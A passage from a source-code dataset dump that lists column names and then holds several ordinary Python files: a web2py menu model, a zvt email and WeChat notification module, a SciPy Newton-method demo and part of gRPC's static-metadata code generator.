hexsha
stringlengths
40
40
size
int64
4
996k
ext
stringclasses
8 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
245
max_stars_repo_name
stringlengths
6
130
max_stars_repo_head_hexsha
stringlengths
40
40
max_stars_repo_licenses
listlengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
245
max_issues_repo_name
stringlengths
6
130
max_issues_repo_head_hexsha
stringlengths
40
40
max_issues_repo_licenses
listlengths
1
10
max_issues_count
int64
1
67k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
245
max_forks_repo_name
stringlengths
6
130
max_forks_repo_head_hexsha
stringlengths
40
40
max_forks_repo_licenses
listlengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
4
996k
avg_line_length
float64
1.33
58.2k
max_line_length
int64
2
323k
alphanum_fraction
float64
0
0.97
content_no_comment
stringlengths
0
946k
is_comment_constant_removed
bool
2 classes
is_sharp_comment_removed
bool
1 class
f705a8ee33fb9360f9cccd2c289e63ed88006920
6,249
py
Python
applications/welcome/models/menu.py
Gorang-Maniar/DGD
c7b2624c0d0bb0127214ec3804acbe2cc70f8ce0
[ "BSD-3-Clause" ]
8
2018-04-13T14:54:02.000Z
2021-03-04T10:58:09.000Z
webui/applications/grid/models/menu.py
pouyana/teireader
ac0a92d8b2e570eae1c0a03fd35a7b281eccd250
[ "MIT" ]
39
2018-03-23T09:25:38.000Z
2022-03-23T15:22:15.000Z
webui/applications/grid/models/menu.py
pouyana/teireader
ac0a92d8b2e570eae1c0a03fd35a7b281eccd250
[ "MIT" ]
3
2019-04-09T03:49:21.000Z
2020-03-05T03:51:25.000Z
# -*- coding: utf-8 -*- # this file is released under public domain and you can use without limitations ######################################################################### ## Customize your APP title, subtitle and menus here ######################################################################### response.logo = A(B('web',SPAN(2),'py'),XML('&trade;&nbsp;'), _class="brand",_href="http://www.web2py.com/") response.title = request.application.replace('_',' ').title() response.subtitle = '' ## read more at http://dev.w3.org/html5/markup/meta.name.html response.meta.author = 'Your Name <you@example.com>' response.meta.description = 'a cool new app' response.meta.keywords = 'web2py, python, framework' response.meta.generator = 'Web2py Web Framework' ## your http://google.com/analytics id response.google_analytics_id = None ######################################################################### ## this is the main application menu add/remove items as required ######################################################################### response.menu = [ (T('Home'), False, URL('default', 'index'), []) ] DEVELOPMENT_MENU = True ######################################################################### ## provide shortcuts for development. remove in production ######################################################################### def _(): # shortcuts app = request.application ctr = request.controller # useful links to internal and external resources response.menu += [ (SPAN('web2py', _class='highlighted'), False, 'http://web2py.com', [ (T('My Sites'), False, URL('admin', 'default', 'site')), (T('This App'), False, URL('admin', 'default', 'design/%s' % app), [ (T('Controller'), False, URL( 'admin', 'default', 'edit/%s/controllers/%s.py' % (app, ctr))), (T('View'), False, URL( 'admin', 'default', 'edit/%s/views/%s' % (app, response.view))), (T('Layout'), False, URL( 'admin', 'default', 'edit/%s/views/layout.html' % app)), (T('Stylesheet'), False, URL( 'admin', 'default', 'edit/%s/static/css/web2py.css' % app)), (T('DB Model'), False, URL( 'admin', 'default', 'edit/%s/models/db.py' % app)), (T('Menu Model'), False, URL( 'admin', 'default', 'edit/%s/models/menu.py' % app)), (T('Database'), False, URL(app, 'appadmin', 'index')), (T('Errors'), False, URL( 'admin', 'default', 'errors/' + app)), (T('About'), False, URL( 'admin', 'default', 'about/' + app)), ]), ('web2py.com', False, 'http://www.web2py.com', [ (T('Download'), False, 'http://www.web2py.com/examples/default/download'), (T('Support'), False, 'http://www.web2py.com/examples/default/support'), (T('Demo'), False, 'http://web2py.com/demo_admin'), (T('Quick Examples'), False, 'http://web2py.com/examples/default/examples'), (T('FAQ'), False, 'http://web2py.com/AlterEgo'), (T('Videos'), False, 'http://www.web2py.com/examples/default/videos/'), (T('Free Applications'), False, 'http://web2py.com/appliances'), (T('Plugins'), False, 'http://web2py.com/plugins'), (T('Layouts'), False, 'http://web2py.com/layouts'), (T('Recipes'), False, 'http://web2pyslices.com/'), (T('Semantic'), False, 'http://web2py.com/semantic'), ]), (T('Documentation'), False, 'http://www.web2py.com/book', [ (T('Preface'), False, 'http://www.web2py.com/book/default/chapter/00'), (T('Introduction'), False, 'http://www.web2py.com/book/default/chapter/01'), (T('Python'), False, 'http://www.web2py.com/book/default/chapter/02'), (T('Overview'), False, 'http://www.web2py.com/book/default/chapter/03'), (T('The Core'), False, 'http://www.web2py.com/book/default/chapter/04'), (T('The Views'), False, 'http://www.web2py.com/book/default/chapter/05'), (T('Database'), False, 'http://www.web2py.com/book/default/chapter/06'), (T('Forms and Validators'), False, 'http://www.web2py.com/book/default/chapter/07'), (T('Email and SMS'), False, 'http://www.web2py.com/book/default/chapter/08'), (T('Access Control'), False, 'http://www.web2py.com/book/default/chapter/09'), (T('Services'), False, 'http://www.web2py.com/book/default/chapter/10'), (T('Ajax Recipes'), False, 'http://www.web2py.com/book/default/chapter/11'), (T('Components and Plugins'), False, 'http://www.web2py.com/book/default/chapter/12'), (T('Deployment Recipes'), False, 'http://www.web2py.com/book/default/chapter/13'), (T('Other Recipes'), False, 'http://www.web2py.com/book/default/chapter/14'), (T('Buy this book'), False, 'http://stores.lulu.com/web2py'), ]), (T('Community'), False, None, [ (T('Groups'), False, 'http://www.web2py.com/examples/default/usergroups'), (T('Twitter'), False, 'http://twitter.com/web2py'), (T('Live Chat'), False, 'http://webchat.freenode.net/?channels=web2py'), ]), (T('Plugins'), False, None, [ ('plugin_wiki', False, 'http://web2py.com/examples/default/download'), (T('Other Plugins'), False, 'http://web2py.com/plugins'), (T('Layout Plugins'), False, 'http://web2py.com/layouts'), ]) ] )] if DEVELOPMENT_MENU: _() if "auth" in locals(): auth.wikimenu()
44.319149
79
0.478957
true
true
f705a92454724dc469a9dcc20bbdf310e2ec08ca
6,419
py
Python
zvt/utils/inform_utils.py
doncat99/zvt
831183bdf7a6d0fc3acd3ea51984df590078eec6
[ "MIT" ]
10
2020-08-08T04:43:00.000Z
2021-07-23T05:38:11.000Z
zvt/utils/inform_utils.py
doncat99/zvt
831183bdf7a6d0fc3acd3ea51984df590078eec6
[ "MIT" ]
1
2021-08-14T12:19:18.000Z
2021-09-30T06:44:04.000Z
zvt/utils/inform_utils.py
doncat99/zvt
831183bdf7a6d0fc3acd3ea51984df590078eec6
[ "MIT" ]
1
2021-12-16T01:57:37.000Z
2021-12-16T01:57:37.000Z
# -*- coding: utf-8 -*- import email import json import logging import smtplib from email.header import Header from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from zvt import zvt_config from zvt.networking.request import get_http_session, sync_get, sync_post class Informer(object): logger = logging.getLogger(__name__) def send_message(self, to_user, title, body, **kwargs): pass class EmailInformer(Informer): def __init__(self, ssl=True) -> None: super().__init__() self.ssl = ssl def send_message_(self, to_user, title, body, **kwargs): host = zvt_config['smtp_host'] port = zvt_config['smtp_port'] if self.ssl: try: smtp_client = smtplib.SMTP_SSL(host=host, port=port) except: smtp_client = smtplib.SMTP_SSL() else: try: smtp_client = smtplib.SMTP(host=host, port=port) except: smtp_client = smtplib.SMTP() smtp_client.connect(host=host, port=port) smtp_client.login(zvt_config['email_username'], zvt_config['email_password']) msg = MIMEMultipart('alternative') msg['Subject'] = Header(title).encode() msg['From'] = "{} <{}>".format(Header('zvt').encode(), zvt_config['email_username']) if type(to_user) is list: msg['To'] = ", ".join(to_user) else: msg['To'] = to_user msg['Message-id'] = email.utils.make_msgid() msg['Date'] = email.utils.formatdate() plain_text = MIMEText(body, _subtype='plain', _charset='UTF-8') msg.attach(plain_text) try: smtp_client.sendmail(zvt_config['email_username'], to_user, msg.as_string()) except Exception as e: self.logger.exception('send email failed', e) def send_message(self, to_user, title, body, sub_size=20, with_sender=True, **kwargs): if type(to_user) is list and sub_size: size = len(to_user) if size >= sub_size: step_size = int(size / sub_size) if size % sub_size: step_size = step_size + 1 else: step_size = 1 for step in range(step_size): sub_to_user = to_user[sub_size * step:sub_size * (step + 1)] if with_sender: sub_to_user.append(zvt_config['email_username']) self.send_message_(sub_to_user, title, body, **kwargs) else: self.send_message_(to_user, title, body, **kwargs) class WechatInformer(Informer): GET_TOKEN_URL = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={}&secret={}".format( zvt_config['wechat_app_id'], zvt_config['wechat_app_secrect']) GET_TEMPLATE_URL = "https://api.weixin.qq.com/cgi-bin/template/get_all_private_template?access_token={}" SEND_MSG_URL = "https://api.weixin.qq.com/cgi-bin/message/template/send?access_token={}" token = None def __init__(self, http_session) -> None: self.refresh_token(http_session) def refresh_token(self, http_session): resp = sync_get(http_session, self.GET_TOKEN_URL) self.logger.info("refresh_token resp.status_code:{}, resp.text:{}".format(resp.status_code, resp.text)) if resp.status_code == 200 and resp.json() and 'access_token' in resp.json(): self.token = resp.json()['access_token'] else: self.logger.exception("could not refresh_token") def send_price_notification(self, http_session, to_user, security_name, current_price, change_pct): the_json = self._format_price_notification(to_user, security_name, current_price, change_pct) the_data = json.dumps(the_json, ensure_ascii=False).encode('utf-8') json_result = sync_post(http_session, self.SEND_MSG_URL.format(self.token), json=the_data) if json_result is not None: self.logger.info("send_price_notification to user:{} data:{} success".format(to_user, the_json)) def _format_price_notification(self, to_user, security_name, current_price, change_pct): if change_pct > 0: title = '吃肉喝汤' else: title = '关灯吃面' # 先固定一个template # { # "template_id": "mkqi-L1h56mH637vLXiuS_ulLTs1byDYYgLBbSXQ65U", # "title": "涨跌幅提醒", # "primary_industry": "金融业", # "deputy_industry": "证券|基金|理财|信托", # "content": "{{first.DATA}}\n股票名:{{keyword1.DATA}}\n最新价:{{keyword2.DATA}}\n涨跌幅:{{keyword3.DATA}}\n{{remark.DATA}}", # "example": "您好,腾新控股最新价130.50元,上涨达到设置的3.2%\r\n股票名:腾讯控股(00700)\r\n最新价:130.50元\r\n涨跌幅:+3.2%\r\n点击查看最新实时行情。" # } template_id = 'mkqi-L1h56mH637vLXiuS_ulLTs1byDYYgLBbSXQ65U' the_json = { "touser": to_user, "template_id": template_id, "url": "http://www.foolcage.com", "data": { "first": { "value": title, "color": "#173177" }, "keyword1": { "value": security_name, "color": "#173177" }, "keyword2": { "value": current_price, "color": "#173177" }, "keyword3": { "value": '{:.2%}'.format(change_pct), "color": "#173177" }, "remark": { "value": "会所嫩模 Or 下海干活?", "color": "#173177" } } } return the_json if __name__ == '__main__': email_action = EmailInformer() email_action.send_message(["5533061@qq.com", '2315983623@qq.com'], 'helo', 'just a test', sub_size=20) http_session = get_http_session() weixin_action = WechatInformer(http_session) weixin_action.send_price_notification(http_session, to_user='oRvNP0XIb9G3g6a-2fAX9RHX5--Q', security_name='BTC/USDT', current_price=1000, change_pct='0.5%') # the __all__ is generated __all__ = ['Informer', 'EmailInformer', 'WechatInformer']
37.319767
128
0.572986
import email import json import logging import smtplib from email.header import Header from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from zvt import zvt_config from zvt.networking.request import get_http_session, sync_get, sync_post class Informer(object): logger = logging.getLogger(__name__) def send_message(self, to_user, title, body, **kwargs): pass class EmailInformer(Informer): def __init__(self, ssl=True) -> None: super().__init__() self.ssl = ssl def send_message_(self, to_user, title, body, **kwargs): host = zvt_config['smtp_host'] port = zvt_config['smtp_port'] if self.ssl: try: smtp_client = smtplib.SMTP_SSL(host=host, port=port) except: smtp_client = smtplib.SMTP_SSL() else: try: smtp_client = smtplib.SMTP(host=host, port=port) except: smtp_client = smtplib.SMTP() smtp_client.connect(host=host, port=port) smtp_client.login(zvt_config['email_username'], zvt_config['email_password']) msg = MIMEMultipart('alternative') msg['Subject'] = Header(title).encode() msg['From'] = "{} <{}>".format(Header('zvt').encode(), zvt_config['email_username']) if type(to_user) is list: msg['To'] = ", ".join(to_user) else: msg['To'] = to_user msg['Message-id'] = email.utils.make_msgid() msg['Date'] = email.utils.formatdate() plain_text = MIMEText(body, _subtype='plain', _charset='UTF-8') msg.attach(plain_text) try: smtp_client.sendmail(zvt_config['email_username'], to_user, msg.as_string()) except Exception as e: self.logger.exception('send email failed', e) def send_message(self, to_user, title, body, sub_size=20, with_sender=True, **kwargs): if type(to_user) is list and sub_size: size = len(to_user) if size >= sub_size: step_size = int(size / sub_size) if size % sub_size: step_size = step_size + 1 else: step_size = 1 for step in range(step_size): sub_to_user = to_user[sub_size * step:sub_size * (step + 1)] if with_sender: sub_to_user.append(zvt_config['email_username']) self.send_message_(sub_to_user, title, body, **kwargs) else: self.send_message_(to_user, title, body, **kwargs) class WechatInformer(Informer): GET_TOKEN_URL = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={}&secret={}".format( zvt_config['wechat_app_id'], zvt_config['wechat_app_secrect']) GET_TEMPLATE_URL = "https://api.weixin.qq.com/cgi-bin/template/get_all_private_template?access_token={}" SEND_MSG_URL = "https://api.weixin.qq.com/cgi-bin/message/template/send?access_token={}" token = None def __init__(self, http_session) -> None: self.refresh_token(http_session) def refresh_token(self, http_session): resp = sync_get(http_session, self.GET_TOKEN_URL) self.logger.info("refresh_token resp.status_code:{}, resp.text:{}".format(resp.status_code, resp.text)) if resp.status_code == 200 and resp.json() and 'access_token' in resp.json(): self.token = resp.json()['access_token'] else: self.logger.exception("could not refresh_token") def send_price_notification(self, http_session, to_user, security_name, current_price, change_pct): the_json = self._format_price_notification(to_user, security_name, current_price, change_pct) the_data = json.dumps(the_json, ensure_ascii=False).encode('utf-8') json_result = sync_post(http_session, self.SEND_MSG_URL.format(self.token), json=the_data) if json_result is not None: self.logger.info("send_price_notification to user:{} data:{} success".format(to_user, the_json)) def _format_price_notification(self, to_user, security_name, current_price, change_pct): if change_pct > 0: title = '吃肉喝汤' else: title = '关灯吃面' template_id = 'mkqi-L1h56mH637vLXiuS_ulLTs1byDYYgLBbSXQ65U' the_json = { "touser": to_user, "template_id": template_id, "url": "http://www.foolcage.com", "data": { "first": { "value": title, "color": "#173177" }, "keyword1": { "value": security_name, "color": "#173177" }, "keyword2": { "value": current_price, "color": "#173177" }, "keyword3": { "value": '{:.2%}'.format(change_pct), "color": "#173177" }, "remark": { "value": "会所嫩模 Or 下海干活?", "color": "#173177" } } } return the_json if __name__ == '__main__': email_action = EmailInformer() email_action.send_message(["5533061@qq.com", '2315983623@qq.com'], 'helo', 'just a test', sub_size=20) http_session = get_http_session() weixin_action = WechatInformer(http_session) weixin_action.send_price_notification(http_session, to_user='oRvNP0XIb9G3g6a-2fAX9RHX5--Q', security_name='BTC/USDT', current_price=1000, change_pct='0.5%') __all__ = ['Informer', 'EmailInformer', 'WechatInformer']
true
true
f705a95dd49f7443385a19b9bb52262d3489eae7
277
py
Python
global_motion_estimation/test scripts/gradient descent tests/dummy.py
Samaretas/global-motion-estimation
798b70ccc23ac6d6c9d25119db22d346c965faca
[ "MIT" ]
null
null
null
global_motion_estimation/test scripts/gradient descent tests/dummy.py
Samaretas/global-motion-estimation
798b70ccc23ac6d6c9d25119db22d346c965faca
[ "MIT" ]
null
null
null
global_motion_estimation/test scripts/gradient descent tests/dummy.py
Samaretas/global-motion-estimation
798b70ccc23ac6d6c9d25119db22d346c965faca
[ "MIT" ]
null
null
null
import numpy as np from scipy import optimize def f(x, a): return x**3 - a def fder(x, a): return 3 * x**2 rng = np.random.default_rng() x = rng.standard_normal(100) a = np.arange(-50, 50) vec_res = optimize.newton(f, x, fprime=fder, args=(a, ), maxiter=200) print(vec_res)
21.307692
69
0.6787
import numpy as np from scipy import optimize def f(x, a): return x**3 - a def fder(x, a): return 3 * x**2 rng = np.random.default_rng() x = rng.standard_normal(100) a = np.arange(-50, 50) vec_res = optimize.newton(f, x, fprime=fder, args=(a, ), maxiter=200) print(vec_res)
true
true
f705a9bd41c3c5d52a4114e43e885fd40f95eb2b
18,618
py
Python
tools/codegen/core/gen_static_metadata.py
benjaminp/grpc
dfb1a0f20624417bff408a14b12a23713085b999
[ "Apache-2.0" ]
1
2020-02-22T04:55:43.000Z
2020-02-22T04:55:43.000Z
tools/codegen/core/gen_static_metadata.py
benjaminp/grpc
dfb1a0f20624417bff408a14b12a23713085b999
[ "Apache-2.0" ]
null
null
null
tools/codegen/core/gen_static_metadata.py
benjaminp/grpc
dfb1a0f20624417bff408a14b12a23713085b999
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python2.7 # Copyright 2015 gRPC authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import hashlib import itertools import collections import os import sys import subprocess import re import perfection # Configuration: a list of either strings or 2-tuples of strings. # A single string represents a static grpc_mdstr. # A 2-tuple represents a static grpc_mdelem (and appropriate grpc_mdstrs will # also be created). # The list of 2-tuples must begin with the static hpack table elements as # defined by RFC 7541 and be in the same order because of an hpack encoding # performance optimization that relies on this. If you want to change this, then # you must change the implementation of the encoding optimization as well. CONFIG = [ # metadata strings 'host', 'grpc-timeout', 'grpc-internal-encoding-request', 'grpc-internal-stream-encoding-request', 'grpc-payload-bin', ':path', 'grpc-encoding', 'grpc-accept-encoding', 'user-agent', ':authority', 'grpc-message', 'grpc-status', 'grpc-server-stats-bin', 'grpc-tags-bin', 'grpc-trace-bin', 'grpc-previous-rpc-attempts', 'grpc-retry-pushback-ms', '1', '2', '3', '4', '', # channel arg keys 'grpc.wait_for_ready', 'grpc.timeout', 'grpc.max_request_message_bytes', 'grpc.max_response_message_bytes', # well known method names '/grpc.lb.v1.LoadBalancer/BalanceLoad', # compression algorithm names 'deflate', 'gzip', 'stream/gzip', # metadata elements # begin hpack static elements (':authority', ''), (':method', 'GET'), (':method', 'POST'), (':path', '/'), (':path', '/index.html'), (':scheme', 'http'), (':scheme', 'https'), (':status', '200'), (':status', '204'), (':status', '206'), (':status', '304'), (':status', '400'), (':status', '404'), (':status', '500'), ('accept-charset', ''), ('accept-encoding', 'gzip, deflate'), ('accept-language', ''), ('accept-ranges', ''), ('accept', ''), ('access-control-allow-origin', ''), ('age', ''), ('allow', ''), ('authorization', ''), ('cache-control', ''), ('content-disposition', ''), ('content-encoding', ''), ('content-language', ''), ('content-length', ''), ('content-location', ''), ('content-range', ''), ('content-type', ''), ('cookie', ''), ('date', ''), ('etag', ''), ('expect', ''), ('expires', ''), ('from', ''), ('host', ''), ('if-match', ''), ('if-modified-since', ''), ('if-none-match', ''), ('if-range', ''), ('if-unmodified-since', ''), ('last-modified', ''), ('link', ''), ('location', ''), ('max-forwards', ''), ('proxy-authenticate', ''), ('proxy-authorization', ''), ('range', ''), ('referer', ''), ('refresh', ''), ('retry-after', ''), ('server', ''), ('set-cookie', ''), ('strict-transport-security', ''), ('transfer-encoding', ''), ('user-agent', ''), ('vary', ''), ('via', ''), ('www-authenticate', ''), # end hpack static elements ('grpc-status', '0'), ('grpc-status', '1'), ('grpc-status', '2'), ('grpc-encoding', 'identity'), ('grpc-encoding', 'gzip'), ('grpc-encoding', 'deflate'), ('te', 'trailers'), ('content-type', 'application/grpc'), (':scheme', 'grpc'), (':method', 'PUT'), ('accept-encoding', ''), ('content-encoding', 'identity'), ('content-encoding', 'gzip'), ('lb-token', ''), ('lb-cost-bin', ''), ] # All entries here are ignored when counting non-default initial metadata that # prevents the chttp2 server from sending a Trailers-Only response. METADATA_BATCH_CALLOUTS = [ # (name) (':path'), (':method'), (':status'), (':authority'), (':scheme'), ('te'), ('grpc-message'), ('grpc-status'), ('grpc-payload-bin'), ('grpc-encoding'), ('grpc-accept-encoding'), ('grpc-server-stats-bin'), ('grpc-tags-bin'), ('grpc-trace-bin'), ('content-type'), ('content-encoding'), ('accept-encoding'), ('grpc-internal-encoding-request'), ('grpc-internal-stream-encoding-request'), ('user-agent'), ('host'), ('lb-token'), ('grpc-previous-rpc-attempts'), ('grpc-retry-pushback-ms'), ] COMPRESSION_ALGORITHMS = [ 'identity', 'deflate', 'gzip', ] STREAM_COMPRESSION_ALGORITHMS = [ 'identity', 'gzip', ] # utility: mangle the name of a config def mangle(elem, name=None): xl = { '-': '_', ':': '', '/': 'slash', '.': 'dot', ',': 'comma', ' ': '_', } def m0(x): if not x: return 'empty' r = '' for c in x: put = xl.get(c, c.lower()) if not put: continue last_is_underscore = r[-1] == '_' if r else True if last_is_underscore and put == '_': continue elif len(put) > 1: if not last_is_underscore: r += '_' r += put r += '_' else: r += put if r[-1] == '_': r = r[:-1] return r def n(default, name=name): if name is None: return 'grpc_%s_' % default if name == '': return '' return 'grpc_%s_' % name if isinstance(elem, tuple): return '%s%s_%s' % (n('mdelem'), m0(elem[0]), m0(elem[1])) else: return '%s%s' % (n('mdstr'), m0(elem)) # utility: generate some hash value for a string def fake_hash(elem): return hashlib.md5(elem).hexdigest()[0:8] # utility: print a big comment block into a set of files def put_banner(files, banner): for f in files: print >> f, '/*' for line in banner: print >> f, ' * %s' % line print >> f, ' */' print >> f # build a list of all the strings we need all_strs = list() all_elems = list() static_userdata = {} # put metadata batch callouts first, to make the check of if a static metadata # string is a callout trivial for elem in METADATA_BATCH_CALLOUTS: if elem not in all_strs: all_strs.append(elem) for elem in CONFIG: if isinstance(elem, tuple): if elem[0] not in all_strs: all_strs.append(elem[0]) if elem[1] not in all_strs: all_strs.append(elem[1]) if elem not in all_elems: all_elems.append(elem) else: if elem not in all_strs: all_strs.append(elem) compression_elems = [] for mask in range(1, 1 << len(COMPRESSION_ALGORITHMS)): val = ','.join(COMPRESSION_ALGORITHMS[alg] for alg in range(0, len(COMPRESSION_ALGORITHMS)) if (1 << alg) & mask) elem = ('grpc-accept-encoding', val) if val not in all_strs: all_strs.append(val) if elem not in all_elems: all_elems.append(elem) compression_elems.append(elem) static_userdata[elem] = 1 + (mask | 1) stream_compression_elems = [] for mask in range(1, 1 << len(STREAM_COMPRESSION_ALGORITHMS)): val = ','.join(STREAM_COMPRESSION_ALGORITHMS[alg] for alg in range(0, len(STREAM_COMPRESSION_ALGORITHMS)) if (1 << alg) & mask) elem = ('accept-encoding', val) if val not in all_strs: all_strs.append(val) if elem not in all_elems: all_elems.append(elem) stream_compression_elems.append(elem) static_userdata[elem] = 1 + (mask | 1) # output configuration args = sys.argv[1:] H = None C = None D = None if args: if 'header' in args: H = sys.stdout else: H = open('/dev/null', 'w') if 'source' in args: C = sys.stdout else: C = open('/dev/null', 'w') if 'dictionary' in args: D = sys.stdout else: D = open('/dev/null', 'w') else: H = open( os.path.join( os.path.dirname(sys.argv[0]), '../../../src/core/lib/transport/static_metadata.h'), 'w') C = open( os.path.join( os.path.dirname(sys.argv[0]), '../../../src/core/lib/transport/static_metadata.cc'), 'w') D = open( os.path.join( os.path.dirname(sys.argv[0]), '../../../test/core/end2end/fuzzers/hpack.dictionary'), 'w') # copy-paste copyright notice from this file with open(sys.argv[0]) as my_source: copyright = [] for line in my_source: if line[0] != '#': break for line in my_source: if line[0] == '#': copyright.append(line) break for line in my_source: if line[0] != '#': break copyright.append(line) put_banner([H, C], [line[2:].rstrip() for line in copyright]) hex_bytes = [ord(c) for c in 'abcdefABCDEF0123456789'] def esc_dict(line): out = "\"" for c in line: if 32 <= c < 127: if c != ord('"'): out += chr(c) else: out += "\\\"" else: out += '\\x%02X' % c return out + "\"" put_banner([H, C], """WARNING: Auto-generated code. To make changes to this file, change tools/codegen/core/gen_static_metadata.py, and then re-run it. See metadata.h for an explanation of the interface here, and metadata.cc for an explanation of what's going on. """.splitlines()) print >> H, '#ifndef GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H' print >> H, '#define GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H' print >> H print >> H, '#include <grpc/support/port_platform.h>' print >> H print >> H, '#include "src/core/lib/transport/metadata.h"' print >> H print >> C, '#include <grpc/support/port_platform.h>' print >> C print >> C, '#include "src/core/lib/transport/static_metadata.h"' print >> C print >> C, '#include "src/core/lib/slice/slice_internal.h"' print >> C str_ofs = 0 id2strofs = {} for i, elem in enumerate(all_strs): id2strofs[i] = str_ofs str_ofs += len(elem) def slice_def(i): return ('{&grpc_static_metadata_refcounts[%d],' ' {{g_bytes+%d, %d}}}') % (i, id2strofs[i], len(all_strs[i])) # validate configuration for elem in METADATA_BATCH_CALLOUTS: assert elem in all_strs print >> H, '#define GRPC_STATIC_MDSTR_COUNT %d' % len(all_strs) print >> H, ('extern const grpc_slice ' 'grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT];') for i, elem in enumerate(all_strs): print >> H, '/* "%s" */' % elem print >> H, '#define %s (grpc_static_slice_table[%d])' % ( mangle(elem).upper(), i) print >> H print >> C, 'static uint8_t g_bytes[] = {%s};' % (','.join( '%d' % ord(c) for c in ''.join(all_strs))) print >> C print >> C, 'static void static_ref(void *unused) {}' print >> C, 'static void static_unref(void *unused) {}' print >> C, ('static const grpc_slice_refcount_vtable static_sub_vtable = ' '{static_ref, static_unref, grpc_slice_default_eq_impl, ' 'grpc_slice_default_hash_impl};') print >> H, ('extern const grpc_slice_refcount_vtable ' 'grpc_static_metadata_vtable;') print >> C, ('const grpc_slice_refcount_vtable grpc_static_metadata_vtable = ' '{static_ref, static_unref, grpc_static_slice_eq, ' 'grpc_static_slice_hash};') print >> C, ('static grpc_slice_refcount static_sub_refcnt = ' '{&static_sub_vtable, &static_sub_refcnt};') print >> H, ('extern grpc_slice_refcount ' 'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT];') print >> C, ('grpc_slice_refcount ' 'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT] = {') for i, elem in enumerate(all_strs): print >> C, ' {&grpc_static_metadata_vtable, &static_sub_refcnt},' print >> C, '};' print >> C print >> H, '#define GRPC_IS_STATIC_METADATA_STRING(slice) \\' print >> H, (' ((slice).refcount != NULL && (slice).refcount->vtable == ' '&grpc_static_metadata_vtable)') print >> H print >> C, ('const grpc_slice grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT]' ' = {') for i, elem in enumerate(all_strs): print >> C, slice_def(i) + ',' print >> C, '};' print >> C print >> H, '#define GRPC_STATIC_METADATA_INDEX(static_slice) \\' print >> H, (' ((int)((static_slice).refcount - ' 'grpc_static_metadata_refcounts))') print >> H print >> D, '# hpack fuzzing dictionary' for i, elem in enumerate(all_strs): print >> D, '%s' % (esc_dict([len(elem)] + [ord(c) for c in elem])) for i, elem in enumerate(all_elems): print >> D, '%s' % (esc_dict([0, len(elem[0])] + [ord(c) for c in elem[0]] + [len(elem[1])] + [ord(c) for c in elem[1]])) print >> H, '#define GRPC_STATIC_MDELEM_COUNT %d' % len(all_elems) print >> H, ('extern grpc_mdelem_data ' 'grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT];') print >> H, ('extern uintptr_t ' 'grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT];') for i, elem in enumerate(all_elems): print >> H, '/* "%s": "%s" */' % elem print >> H, ('#define %s (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[%d], ' 'GRPC_MDELEM_STORAGE_STATIC))') % (mangle(elem).upper(), i) print >> H print >> C, ('uintptr_t grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT] ' '= {') print >> C, ' %s' % ','.join( '%d' % static_userdata.get(elem, 0) for elem in all_elems) print >> C, '};' print >> C def str_idx(s): for i, s2 in enumerate(all_strs): if s == s2: return i def md_idx(m): for i, m2 in enumerate(all_elems): if m == m2: return i def offset_trials(mink): yield 0 for i in range(1, 100): for mul in [-1, 1]: yield mul * i def perfect_hash(keys, name): p = perfection.hash_parameters(keys) def f(i, p=p): i += p.offset x = i % p.t y = i / p.t return x + p.r[y] return { 'PHASHRANGE': p.t - 1 + max(p.r), 'PHASHNKEYS': len(p.slots), 'pyfunc': f, 'code': """ static const int8_t %(name)s_r[] = {%(r)s}; static uint32_t %(name)s_phash(uint32_t i) { i %(offset_sign)s= %(offset)d; uint32_t x = i %% %(t)d; uint32_t y = i / %(t)d; uint32_t h = x; if (y < GPR_ARRAY_SIZE(%(name)s_r)) { uint32_t delta = (uint32_t)%(name)s_r[y]; h += delta; } return h; } """ % { 'name': name, 'r': ','.join('%d' % (r if r is not None else 0) for r in p.r), 't': p.t, 'offset': abs(p.offset), 'offset_sign': '+' if p.offset > 0 else '-' } } elem_keys = [ str_idx(elem[0]) * len(all_strs) + str_idx(elem[1]) for elem in all_elems ] elem_hash = perfect_hash(elem_keys, 'elems') print >> C, elem_hash['code'] keys = [0] * int(elem_hash['PHASHRANGE']) idxs = [255] * int(elem_hash['PHASHNKEYS']) for i, k in enumerate(elem_keys): h = elem_hash['pyfunc'](k) assert keys[h] == 0 keys[h] = k idxs[h] = i print >> C, 'static const uint16_t elem_keys[] = {%s};' % ','.join( '%d' % k for k in keys) print >> C, 'static const uint8_t elem_idxs[] = {%s};' % ','.join( '%d' % i for i in idxs) print >> C print >> H, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b);' print >> C, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b) {' print >> C, ' if (a == -1 || b == -1) return GRPC_MDNULL;' print >> C, ' uint32_t k = (uint32_t)(a * %d + b);' % len(all_strs) print >> C, ' uint32_t h = elems_phash(k);' print >> C, ' return h < GPR_ARRAY_SIZE(elem_keys) && elem_keys[h] == k && elem_idxs[h] != 255 ? 